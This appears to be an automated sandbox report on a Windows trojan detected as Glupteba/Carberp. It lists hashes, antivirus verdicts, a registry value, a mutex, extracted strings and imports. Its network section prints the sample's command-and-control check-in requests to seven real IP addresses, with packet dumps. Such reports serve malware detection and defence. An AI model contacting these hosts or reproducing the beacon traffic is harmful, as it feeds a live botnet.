Analysis Date2015-05-11 16:37:50
MD52339db7de9482be9b58204f7b7262873
SHA14181ec822050d53acd2fa37c54edbe266a3aef73

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 335cfd9cf05a312e95f621aa515fe844 sha1: bf7e296ff67629cce8b69efa77d65295156ccbc1 size: 94208
Section.rdata md5: 9f2701954cef5874fe21c5337b04ba12 sha1: 0e192772e0da1db20f90348161fb5aa62c18d126 size: 20480
Section.data md5: dcfa3cbb7cb3c635a6b835088ea7127a sha1: fc2a2bb8e7b1a4a51e29da7455f05a22416263e9 size: 8192
Section.rsrc md5: a5c41bd3188f5f4857cfdb839b98506c sha1: 368b614f69237e5b2276cedc68f475abf5a9314e size: 8192
Timestamp2015-01-28 14:00:29
PackerMicrosoft Visual C++ v6.0
PEhash7a335b37c5817e6994115330c251e34fb78ef13c
IMPhash61393783fe9a02b35d53a3f3962f7160
AVAd-AwareTrojan.GenericKD.2126051
AVAlwil (avast)Agent-AVKG [Trj]
AVArcabit (arcavir)Trojan.GenericKD.2126051
AVAuthentiumW32/Trojan.YCXZ-1974
AVAvira (antivir)TR/Crypt.ZPACK.123655
AVBitDefenderTrojan.GenericKD.2126051
AVBullGuardTrojan.GenericKD.2126051
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Carberp.r4
AVClamAVno_virus
AVDr. WebTrojan.DownLoad3.35231
AVEmsisoftTrojan.GenericKD.2126051
AVEset (nod32)Win32/Glupteba.M
AVFortinetW32/Glupteba.M!tr
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.GenericKD.2126051
AVGrisoft (avg)Small.GVU
AVIkarusTrojan.Win32.Glupteba
AVK7Trojan ( 00286e241 )
AVKasperskyno_virus
AVMalwareBytesTrojan.Agent
AVMcafeeRDN/Generic.tfr!eh
AVMicrosoft Security EssentialsTrojan:Win32/Carberp.I
AVMicroWorld (escan)Trojan.GenericKD.2126051
AVPadvishno_virus
AVRisingno_virus
AVSophosTroj/Glupteba-F
AVSymantecTrojan.Gen
AVTrend Microno_virus
AVTwisterno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝
15150124\\x00
Creates File\Device\Afd\Endpoint
Creates MutexGlobal\MD7H82HHF7EH2D73

Network Details:

HTTP GEThttp://222.82.218.14:45570/stat?uid=100&downlink=1111&uplink=1111&id=00016FFB&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://71.245.120.18:39394/stat?uid=100&downlink=1111&uplink=1111&id=000183C1&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://213.238.168.2:33879/stat?uid=100&downlink=1111&uplink=1111&id=00019759&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://46.165.233.149:35173/stat?uid=100&downlink=1111&uplink=1111&id=0001AAF0&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://108.163.241.250:31131/stat?uid=100&downlink=1111&uplink=1111&id=0001BE98&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://109.104.94.2:11754/stat?uid=100&downlink=1111&uplink=1111&id=0001D23F&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://223.165.30.17:36991/stat?uid=100&downlink=1111&uplink=1111&id=0001E5D7&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 222.82.218.14:45570
Flows TCP192.168.1.1:1031 ➝ 222.82.218.14:45570
Flows TCP192.168.1.1:1032 ➝ 71.245.120.18:39394
Flows TCP192.168.1.1:1033 ➝ 213.238.168.2:33879
Flows TCP192.168.1.1:1034 ➝ 46.165.233.149:35173
Flows TCP192.168.1.1:1035 ➝ 108.163.241.250:31131
Flows TCP192.168.1.1:1036 ➝ 109.104.94.2:11754
Flows TCP192.168.1.1:1037 ➝ 223.165.30.17:36991

Raw Pcap
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303136 46464226 73746174 70617373   0016FFB&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d323263 31653130   =30&guid=22c1e10
0x00000070 (00112)   652d3131 66662d34 3834662d 39316239   e-11ff-484f-91b9
0x00000080 (00128)   2d343062 31366138 39656134 6326636f   -40b16a89ea4c&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303138 33433126 73746174 70617373   00183C1&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d323263 31653130   =30&guid=22c1e10
0x00000070 (00112)   652d3131 66662d34 3834662d 39316239   e-11ff-484f-91b9
0x00000080 (00128)   2d343062 31366138 39656134 6326636f   -40b16a89ea4c&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303139 37353926 73746174 70617373   0019759&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d323263 31653130   =30&guid=22c1e10
0x00000070 (00112)   652d3131 66662d34 3834662d 39316239   e-11ff-484f-91b9
0x00000080 (00128)   2d343062 31366138 39656134 6326636f   -40b16a89ea4c&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303141 41463026 73746174 70617373   001AAF0&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d323263 31653130   =30&guid=22c1e10
0x00000070 (00112)   652d3131 66662d34 3834662d 39316239   e-11ff-484f-91b9
0x00000080 (00128)   2d343062 31366138 39656134 6326636f   -40b16a89ea4c&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303142 45393826 73746174 70617373   001BE98&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d323263 31653130   =30&guid=22c1e10
0x00000070 (00112)   652d3131 66662d34 3834662d 39316239   e-11ff-484f-91b9
0x00000080 (00128)   2d343062 31366138 39656134 6326636f   -40b16a89ea4c&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303144 32334626 73746174 70617373   001D23F&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d323263 31653130   =30&guid=22c1e10
0x00000070 (00112)   652d3131 66662d34 3834662d 39316239   e-11ff-484f-91b9
0x00000080 (00128)   2d343062 31366138 39656134 6326636f   -40b16a89ea4c&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303145 35443726 73746174 70617373   001E5D7&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d323263 31653130   =30&guid=22c1e10
0x00000070 (00112)   652d3131 66662d34 3834662d 39316239   e-11ff-484f-91b9
0x00000080 (00128)   2d343062 31366138 39656134 6326636f   -40b16a89ea4c&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..


Strings

&a04h4t7 B22
&B25n2 Pp7B6Sg V0qS OE81z
&bptI l920
&BrgQ F3Rc o02
&c72 q3Ll4
&c9A
&CdSB J093p8
CompanyName
&d8m2Dy1 n79 VJk0l0a
&E8C
&Eb4 H8o3Udy
&f6938xp
&Fo5
&fTXSSJ
&g1yAF3b
&G96Uzy Qg130lm R6Z ljq
&GE1172 c0UH5 dn598 YO0K
&H245 Jw308
&H51 Ygy59 UiN cf0
holders
&hx41 QYvC63 e88Fk VqLD
hydra
&I7g sRw522J1 Km7ye f71
&Ig032 ac2viD S0G
ignorable
&ii2 uh2l6F3 s565m X528
implores
indispose
interposing
ionisation
&IQ9
&iRA j3tw25g UW7 R3PfDR4
&j13479
&j19fj vyF7 v0cV6P0
&k6d295
&K75aW73
&K9Y0YalJ e6vyiCFh Db6ba7H W903C91q
&Ky2 t3p B5A22gx
&L8Y2GT7 W179q8
laptops
lathes
lauding
lauds
letters
loiters
&lWk1SO h0YMW XcE8S6g7
&m28 OHb09
malcontents
mastered
matadors
metal
miscast
missy
misunderstands
&Mjp c0Ai
&ml61T S74K0I
MS Sans Serif
&n370wC
namecalling
&nZG0H341 Z5x1M5N
&o579J577
&OfMuGC6F
&OLK5 X9N5o P1012ex
onager
pantile
parabolic
patch
pill
pipping
planar
plasmid
porcine
poses
privations
professionalisation
&Q395b681 a7R7bQ tCev26w Xjv
&q7w30 aP9wk4
&r18f44d F5Ldu8M GW89R0o DiJ7E0
&RWt780X7 OZ5 t08f
&Rz8xh2g2 MYr5tks4
&S9T23Q0 JS91Or0 Jpx6d r2V9
Sigma Solutions
&Sn734 P4W7 Y85y8 q0mG5
&sn8QNO
&t545K qb13y
&TGwX R86
&U751IU
&U809HH39
&UG4me A00hx ad3526l
&uRBph9 M3Hs0
&v72B5 lsIX10 nv2k93A9 ct4X285S
&vd522 V1vB dIaM9yq
VS_VERSION_INFO
&Wk7
&x37YjPg kyvrU5 ZW92rOt d53WH0a
&y0os M8IC12U
&y148 Qh88
&y2G iS0J6 IPR8h d88
&Y2y3569Q PGm4Iykx R696 d9AzD
&z5289
&zA26N CC5K GS3
0	0%/-;3
):,:38
"3j$q+X
3@}ZQT#;+
&6qT'@
)"7!#6
79$S6uk
%9E^HVW
|9yyJ&\
AccessibleObjectFromWindow
_acmdln
AddAccessDeniedAce
AddAtomA
AddAtomW
_adjust_fdiv
ADVAPI32.dll
agkM!h
AllocateAndInitializeSid
AllocateLocallyUniqueId
AreAllAccessesGranted
BackupEventLogW
+B'h+y
BuildImpersonateExplicitAccessWithNameA
BuildImpersonateTrusteeA
BuildSecurityDescriptorA
BuildTrusteeWithNameA
B#<;VN}-rN
ChangeClipboardChain
ChangeDisplaySettingsExA
ChangeMenuA
ChangeServiceConfig2W
ChangeServiceConfigA
ChangeServiceConfigW
CharToOemBuffA
<Cj cTEL
ClientToScreen
CloseServiceHandle
comdlg32.dll
CompareStringW
_controlfp
CopyImage
CreateEventA
CreateIconIndirect
CreateIoCompletionPort
CreateMailslotA
CreateMDIWindowW
CreatePrivateObjectSecurity
CreateRestrictedToken
D2.XZ${u
@.data
DdeInitializeW
DdeUninitialize
DecryptFileA
DeleteAtom
DeleteCriticalSection
DeleteMenu
dfggfgjg
DisconnectNamedPipe
DispatchMessageA
DlgDirListA
_d%L`}k
DragAcceptFiles
DragObject
DrawCaption
DuplicateHandle
EnumDependentServicesW
EnumDesktopsW
EnumDisplaySettingsA
EnumServicesStatusA
EnumServicesStatusW
EnumSystemLocalesA
EnumTimeFormatsA
EnumWindows
_except_handler3
FatalAppExitW
FillConsoleOutputCharacterW
FindAtomA
FindFirstChangeNotificationA
FixBrushOrgEx
FormatMessageA
GDI32.dll
GetAce
GetAtomNameW
GetAuditedPermissionsFromAclW
GetClipboardOwner
GetCompressedFileSizeW
GetConsoleCP
GetConsoleTitleA
GetDiskFreeSpaceA
GetDlgCtrlID
GetDlgItemTextW
GetEffectiveRightsFromAclW
GetExitCodeProcess
GetExpandedNameW
GetExplicitEntriesFromAclW
GetFileAttributesA
GetFileAttributesExW
GetFileTitleW
GetLastError
GetLocaleInfoA
GetLongPathNameW
__getmainargs
GetMenuItemInfoW
GetModuleHandleA
GetMultipleTrusteeOperationW
GetPrivateProfileIntW
GetPrivateProfileSectionNamesA
GetProcessShutdownParameters
GetSaveFileNameA
GetSecurityDescriptorDacl
GetSecurityDescriptorSacl
GetServiceKeyNameA
GetShortPathNameA
GetSidIdentifierAuthority
GetSidLengthRequired
GetSidSubAuthority
GetStartupInfoA
GetSubMenu
GetSysColor
GetSysColorBrush
GetTempFileNameW
GetThreadContext
GetTokenInformation
GetTrusteeTypeA
GetTrusteeTypeW
GetUpdateRect
GetUserDefaultLangID
GetVersion
GetVersionExA
GetWindowsDirectoryW
GlobalAddAtomW
GlobalGetAtomNameA
gvt oY
HeapLock
IMM32.dll
ImmGetContext
ImpersonateNamedPipeClient
_initterm
I_RpcDeleteMutex
IsCharAlphaNumericW
IsCharLowerW
IsIconic
IsTokenRestricted
jfgkhg
;%JvOU1
KERNEL32.dll
LogonUserA
LookupSecurityDescriptorPartsA
LookupSecurityDescriptorPartsW
LsaEnumerateAccountRights
LsaEnumerateTrustedDomains
LsaEnumerateTrustedDomainsEx
LsaFreeMemory
LsaQueryDomainInformationPolicy
LsaRetrievePrivateData
LXM27<Y
LZ32.dll
Msi.dll
MSVCRT.dll
NotifyBootConfigStatus
NotifyChangeEventLog
nu)0W2
NW4OC	
ObjectCloseAuditAlarmA
ObjectDeleteAuditAlarmA
ObjectDeleteAuditAlarmW
ObjectFromLresult
OLEACC.dll
OpenBackupEventLogA
OpenProcessToken
OpenSCManagerW
OpenThreadToken
__p__commode
__p__fmode
PostThreadMessageW
princess
PrivilegedServiceAuditAlarmW
qA~DRx
QueryServiceConfig2W
QueryServiceConfigW
QueryServiceLockStatusA
QueryServiceLockStatusW
QueryServiceObjectSecurity
QueryServiceStatus
raLmiTyp
RASAPI32.dll
RasCreatePhonebookEntryW
RasDeleteEntryA
RasEditPhonebookEntryA
RasEditPhonebookEntryW
RasEnumConnectionsW
RasGetConnectStatusW
RasGetCountryInfoA
RasGetCountryInfoW
RasGetEntryPropertiesW
RasSetEntryDialParamsW
RasValidateEntryNameA
RasValidateEntryNameW
`.rdata
RegCreateKeyA
RegDeleteValueW
RegEnumKeyA
RegisterServiceCtrlHandlerA
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExW
RegQueryMultipleValuesA
RegQueryMultipleValuesW
RegQueryValueExW
RegRestoreKeyW
RegSetKeySecurity
RegSetValueExA
RegSetValueW
RegUnLoadKeyW
ResUtilDupString
ResUtilGetProperties
ResUtilIsPathValid
ResUtilPropertyListFromParameterBlock
RESUTILS.dll
ResUtilSetExpandSzValue
ResUtilVerifyResourceService
RPCRT4.dll
SendMessageW
__set_app_type
SetNamedSecurityInfoW
SetScrollPos
SetSecurityDescriptorSacl
SetServiceStatus
__setusermatherr
SetUserObjectInformationA
SetUserObjectInformationW
SHELL32.dll
StartServiceCtrlDispatcherW
SwitchDesktop
!This program cannot be run in DOS mode.
TrackPopupMenuEx
>T;x>X
Udds1h
UnregisterClassW
USER32.dll
}VI\4~
V%K~.<v
WindowFromDC
WinHelpW
x#7hr'
_XcptFilter
x$MjkB
y@{;$753